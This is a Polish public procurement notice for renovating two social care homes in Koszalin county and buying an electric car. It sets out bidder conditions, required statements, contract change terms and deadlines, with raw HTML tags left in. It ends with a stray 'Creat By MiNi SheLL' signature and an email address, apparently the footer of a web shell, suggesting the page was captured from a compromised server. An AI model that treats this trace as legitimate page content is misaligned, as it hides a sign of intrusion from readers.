CZEŚCI II ZAMÓWIENIA<br/><br/>1.	Zgodnie z art. 57 pkt 2) ustawy Pzp o udzielenie zamówienia określonego w niniejszym postępowaniu mogą ubiegać się Wykonawcy, którzy spełniają następujące WARUNKI UDZIAŁU W POSTĘPOWANIU określone przez Zamawiającego dotyczące:<br/><br/>1)	zdolności do występowania w obrocie gospodarczym: Zamawiający nie określa warunku w tym zakresie.<br/><br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów : Zamawiający nie określa warunku w tym zakresie.<br/><br/>3)	sytuacji ekonomicznej lub finansowej: Zamawiający nie określa warunku w tym zakresie.<br/> <br/>4)	zdolności technicznej lub zawodowej: Zamawiający wymaga aby Wykonawca posiadał niezbędną wiedzę i doświadczenie do wykonania przedmiotu zamówienia w szczególności potwierdził, że:<br/><br/>w okresie ostatnich 5 lat licząc wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie minimum jedno zamówienie o wartości min. 1 000 000,00 PLN brutto, które obejmowało wykonanie lub remont/przebudowę/nadbudowę/rozbudowę budynku/budynków, obejmujące w szczególności swoim zakresem roboty ogólnobudowlane, roboty w branży sanitarnej, roboty w branży elektrycznej oraz związane z energią odnawialną.<br/>LUB<br/>w okresie ostatnich 5 lat licząc wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie dwa lub trzy oddzielne zamówienia o łącznej wartości min. 1 000 000,00 PLN brutto, które obejmowały wykonanie lub remont/przebudowę/nadbudowę/rozbudowę budynku/budynków, obejmujące w szczególności swoim zakresem roboty ogólnobudowlane, roboty w branży sanitarnej, roboty w branży elektrycznej oraz związane z energią odnawialną.<br/><br/>DOTYCZY CZEŚCI III ZAMÓWIENIA<br/>Zamawiający nie określa warunków udziału w postępowaniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga od Wykonawcy złożenia podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający nie wymaga od Wykonawcy złożenia podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga od Wykonawcy złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> WRAZ Z OFERTĄ NALEŻY PRZEKAZAĆ/ZŁOŻYĆ:<br/>1)	dla CZĘŚCI I i/lub CZĘŚCI II OŚWIADCZENIE WYKONAWCY, o którym mowa w art. 125 ust. 1 ustawy Pzp O NIEPODLEGANIU WYKLUCZENIU I SPEŁNIANIU WARUNKÓW UDZIAŁU W POSTĘPOWANIU, w zakresie wskazanym przez Zamawiającego sporządzone odpowiednio na/wg załącznika nr 2 i/lub 2A do Specyfikacji Warunków Zamówienia dotyczącej prowadzonego postępowania.<br/><br/>2)	dla CZĘŚCI III OŚWIADCZENIE WYKONAWCY, o którym mowa w art. 125 ust. 1 ustawy Pzp O NIEPODLEGANIU WYKLUCZENIU Z POSTĘPOWANIA, w zakresie wskazanym przez Zamawiającego sporządzone na/wg załącznika nr 2B do Specyfikacji Warunków Zamówienia dotyczącej prowadzonego postępowania.<br/><br/>3)	w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy, Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia lub podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy Pzp, jest umocowana do reprezentowania odpowiednio Wykonawcy, Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia lub podmiotu udostępniającego zasoby:<br/>a)	ODPIS LUB INFORMACJĘ Z KRAJOWEGO REJESTRU SĄDOWEGO LUB CENTRALNEJ EWIDENCJI I INFORMACJI O DZIAŁALNOŚCI GOSPODARCZEJ LUB Z INNEGO WŁAŚCIWEGO REJESTRU POTWIERDZAJĄCE UMOCOWANIE DO REPREZENTOWANIA odpowiednio Wykonawcy, Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia publicznego, podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy Pzp /jeżeli występuje/ wystawiony przez upoważniony podmiot inny niż Wykonawca, Wykonawca wspólnie ubiegający się o udzielenie zamówienia publicznego, podmiot udostępniający zasoby;<br/>b)	PEŁNOMOCNICTWO /jeżeli występuje/ wystawione przez Wykonawcę, Wykonawcę wspólnie ubiegającego się o udzielenie zamówienia lub podmiot udostępniający zasoby;<br/>c)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia PEŁNOMOCNICTWO lub INNY DOKUMENT podpisany przez każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego stosownie do treści art. 58 ust. 2 ustawy Pzp wynika ustanowienie pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/> <br/>4)	dla CZĘŚCI I i/lub CZĘŚCI II OŚWIADCZENIE SKŁADANE NA PODSTAWIE ART. 117 UST. 4 USTAWY PZP /jeżeli dotyczy/, z którego wynika, które roboty budowalne lub usługi wykonają poszczególni Wykonawcy wspólnie ubiegający się o udzielenie zamówienia sporządzone odpowiednio na/wg załącznika nr 4 i/lub 4A do Specyfikacji Warunków Zamówienia dotyczącej prowadzonego postępowania.<br/><br/>5)	DOTYCZY CZĘŚCI I i CZĘŚCI II <br/>Jeżeli Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu polega na zasobach innych podmiotów na zasadach określonych w art. 118 ustawy Pzp, Wykonawca musi przekazać/złożyć wraz z ofertą:<br/>a)	ZOBOWIĄZANIE PODMIOTU UDOSTĘPNIAJĄCEGO WYKONAWCY SWOJE ZASOBY sporządzone odpowiednio na/wg załącznika nr 5 i/lub 5A do Specyfikacji Warunków Zamówienia dotyczącej prowadzonego postępowania.<br/>b)	OŚWIADCZENIE PODMIOTU UDOSTĘPNIAJĄCEGO WYKONAWCY SWOJE ZASOBY, o którym mowa w art. 125 ust. 5 ustawy Pzp, O NIEPODLEGANIU WYKLUCZENIU I SPEŁNIANIU WARUNKÓW UDZIAŁU W POSTĘPOWANIU, sporządzone na/wg załącznika nr 2C do Specyfikacji Warunków Zamówienia dotyczącej prowadzonego postępowania.<br/> <br/>DOKUMENTY PODMIOTÓW ZAGRANICZNYCH: Wykonawca mający siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, składa w niniejszym postępowaniu wraz z ofertą takie same dokumenty/oświadczenia jak Wykonawca polski (oświadczenia/dokumenty wymienione powyżej). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Przepisy ustawy Pzp oraz zapisy Specyfikacji Warunków Zamówienia dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>WYMAGANIA DOTYCZĄCE SKŁADANIA OFERTY PRZEZ WYKONAWCÓW WSPÓLNIE UBIEGAJĄCYCH SIĘ O UDZIELENIE ZAMÓWIENIA (np. spółka cywilna, konsorcjum):<br/>1)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są stosownie do treści art. 58 ust. 2 ustawy Pzp, ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Ustanowienie pełnomocnika musi być potwierdzone stosownym pełnomocnictwem lub innym dokumentem (np. umowa konsorcjum, umowa spółki cywilnej, uchwała wspólników spółki cywilnej) podpisanym przez każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego wynika umocowanie pełnomocnika do reprezentowania tych Wykonawców w prowadzonym postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2)	Ofertę składaną przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia podpisują wszyscy Wykonawcy lub ustanowiony pełnomocnik, który został umocowany do ich reprezentowania. W przypadku podpisania oferty przez pełnomocnika wraz z ofertą należy złożyć pełnomocnictwo lub inny dokument (np. umowa konsorcjum, umowa spółki cywilnej, uchwała wspólników spółki cywilnej), z którego wynika umocowanie do samodzielnej reprezentacji.<br/>3)	Zgodnie z art. 445 ust. 1 ustawy Pzp Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy.<br/>4)	Wypełniając formularz ofertowy w miejscu do podania danych Wykonawcy należy podać dane dotyczące wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, a nie tylko dane pełnomocnika.<br/>5)	Wszelka korespondencja będzie prowadzona z ustanowionym pełnomocnikiem.<br/>6)	Każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia (dotyczy również wspólników spółki cywilnej) musi złożyć odrębnie:<br/>a)	DLA CZĘŚĆI I i/lub CZĘŚCI II: oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu w zakresie wskazanym przez Zamawiającego sporządzone odpowiednio na/wg załącznika nr 2 i/lub 2A do Specyfikacji Warunków Zamówienia dotyczącej prowadzonego postępowania.;<br/>b)	DLA CZĘŚCI III: oświadczenie o niepodleganiu wykluczeniu z postępowania w zakresie wskazanym przez Zamawiającego sporządzone na/wg załącznika nr 2B do Specyfikacji Warunków Zamówienia dotyczącej prowadzonego postępowania.<br/>W przypadku wspólników spółki cywilnej ww. oświadczenie każdego wspólnika musi zawierać dane przedsiębiorcy składającego oświadczenie (m.in. pełną nazwę, adres, NIP przedsiębiorcy), a nie dane spółki cywilnej. <br/>7)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (dotyczy również wspólników spółki cywilnej) muszą złożyć wraz z ofertą oświadczenie składane na podstawie art. 117 ust. 4 ustawy Pzp, z którego wynika, które usługi wykonają poszczególni Wykonawcy wspólnie ubiegający się o udzielenie zamówienia sporządzone odpowiednio na/wg załącznika nr 4 i/lub 4A do Specyfikacji Warunków Zamówienia dotyczącej prowadzonego postępowania. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> DOTYCZY CZĘŚCI I i CZĘŚCI II ZAMÓWIENIA<br/><br/>Z uwagi na dużą ilość znaków nie jest możliwe wprowadzenie w niniejszym punkcie ogłoszenia całego opisu przewidywanych zmian umowy. <br/><br/>Szczegółowy opis rodzaju i zakresu przewidywanych zmian umowy określonych przez Zamawiającego na podstawie art. 455 ust. 1 pkt 1) ustawy Pzp oraz warunki wprowadzenia zmian, zostały określone w rozdziale XXX Specyfikacji Warunków Zamówienia dotyczącej prowadzonego postępowania.<br/><br/>W rozdziale XXX Specyfikacji Warunków Zamówienia dotyczącej prowadzonego postępowania zostały również określone zasady wprowadzania zmian wynagrodzenia należnego Wykonawcy, które zostały opisane w punktach „ZMIANA WYNAGRODZENIA WYKONAWCY” i „WALORYZACJA WYNAGRODZENIA”.<br/><br/>===========================================================<br/><br/>DOTYCZY CZĘŚCI III ZAMÓWIENIA<br/><br/>Z uwagi na dużą ilość znaków nie jest możliwe wprowadzenie w niniejszym punkcie ogłoszenia całego opisu przewidywanych zmian umowy<br/><br/>Szczegółowy opis rodzaju i zakresu przewidywanych zmian umowy określonych przez Zamawiającego na podstawie art. 455 ust. 1 pkt 1) ustawy Pzp oraz warunki wprowadzenia zmian, zostały określone w rozdziale XXX Specyfikacji Warunków Zamówienia dotyczącej prowadzonego postępowania.<br/><br/>W rozdziale XXX Specyfikacji Warunków Zamówienia dotyczącej prowadzonego postępowania zostały również określone zasady waloryzacji wynagrodzenia należnego Wykonawcy, które zostały opisane w punkcie „WALORYZACJA WYNAGRODZENIA”. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-08-02 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę w przedmiotowym postępowaniu za pośrednictwem platformy zakupowej tj.: platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/powiat_koszalin</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-08-02 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-31</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> INFORMACJE DODATKOWE:<br/><br/>1) Przedmiot zamówienia jest finansowany z Rządowego Funduszu Polski Ład: Programu Inwestycji Strategicznych oraz ze środków własnych Zamawiającego.<br/><br/>2) W związku z art. 310 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych, Zamawiający przewiduje możliwość unieważnienia postępowania, jeżeli środki publiczne z Rządowego Funduszu Polski Ład: Programu Inwestycji Strategicznych, które Zamawiający zamierza przeznaczyć na sfinansowanie zamówienia nie zostaną mu przyznane.<br/><br/>3) OPIS PRZEDMIOTU ZAMÓWIENIA ZAWARTY WE WNIOSKU O DOFINANSOWANIE I SPECYFIKACJI WARUNKÓW ZAMÓWIENIA:<br/><br/>Przedmiot zamówienia/nazwa inwestycji: Modernizacja infrastruktury społecznej w powiecie koszalińskim.<br/><br/>Opis inwestycji: Projekt dotyczy poprawy stanu infrastruktury społecznej w powiecie koszalińskim i zapewnienia na jej potrzeby tabory z napędem zeroemisyjnym. Zakres prac objętych projektem obejmuje: <br/>(1) prace konserwatorskie, budowlane i odtworzeniowe dachu i budynku domu pomocy społecznej (DPS) w Nowych Bielicach wraz z dostosowaniem infrastruktury dla potrzeb osób z niepełnosprawnościami, <br/>(2) prace remontowe i roboty związane z poprawą efektywności energetycznej budynków DPS w Żydowie wraz z budową na ich potrzeby odnawialnych źródeł energii (OZE), <br/>(3) zakup samochodu elektrycznego do obsługi infrastruktury społecznej. <br/>Budynki objęte projektem służą na potrzeby pomocy społecznej i są niezbędne do świadczenia usług bytowych, wspomagających, opiekuńczych i innych zgodnie z rozporządzeniem Ministra Pracy i Polityki Społecznej w sprawie domów pomocy społecznej. Są one mocno wyeksploatowane, wymagają pilnych prac remontowych, adaptacyjnych i termomodernizacyjnych. DPS Nowe Bielice (zgodnie z decyzją Wojewody Zachodniopomorskiego), ma pozwolenie na zamieszkanie przez 142 osoby dorosłe niepełnosprawne intelektualnie oraz dzieci i młodzież niepełnosprawną intelektualnie. Ze względu na istniejące bariery architektoniczne oraz konstrukcję budynku niezbędne jest zniwelowanie barier architektonicznych oraz konieczny jest pilny remont dachu. Budynek DPS w Żydowie przeznaczony jest dla 215 osób przewlekle chorych psychicznie. Wymaga prac remontowych i termomodernizacyjnych, poprawiających w sposób istotny jego efektywność energetyczną oraz umożliwiających produkcję i wykorzystanie OZE. Zakup osobowego samochodu elektrycznego jest konieczny ze względu na konieczność stałej obsługi domów pomocy społecznej. Wykorzystanie taboru bezemisyjnego wpłynie na zmniejszenie emisji do środowiska gazów cieplarnianych. Powyższe prace i działania są niezbędne, ponieważ budynki DPS Nowe Bielice oraz DPS Żydowo ulegają dekapitalizacji oraz degradacji spowodowanej upływem czasu. Projekt znacząco wpłynie na poprawę i podniesienie standardu życia mieszkańców tych DPS-ów oraz zwiększy ich bezpieczeństwo. Łączna ilość zamieszkujących w obu DPS-ach wynosi 357 osób. Ze względu na specyfikę działalności obu obiektów, zapotrzebowanie na świadczone przez nie usługi społeczne jest duże. Oba DPS-y są kluczowymi obiektami infrastruktury społecznej w powiecie koszalińskim o oddziaływaniu ponadregionalnym. Przyjmowani do nich mieszkańcy są z terenu powiatu koszalińskiego oraz innych rejonów kraju. W związku z tym, niezbędne jest zapewnienie mieszkańcom DPS odpowiednich warunków życia. Stan techniczny obiektów ma też istotny wpływ na jakość prowadzonych terapii. Bardzo ważnym celem projektu jest także zmniejszenie kosztów utrzymania budynków, ponieważ w obecnym stanie generują one wysokie koszty bieżące.<br/><br/>Na przedmiot zamówienia składają się trzy części określone w SWZ i ogłoszeniu o zamówieniu. Szczegółowe określenia przedmiotów zamówienia dla każdej części zostały określone w Specyfikacji Warunków Zamówienia i załącznikach do Specyfikacji Warunków Zamówienia.

Creat By MiNi SheLL
Email: jattceo@gmail.com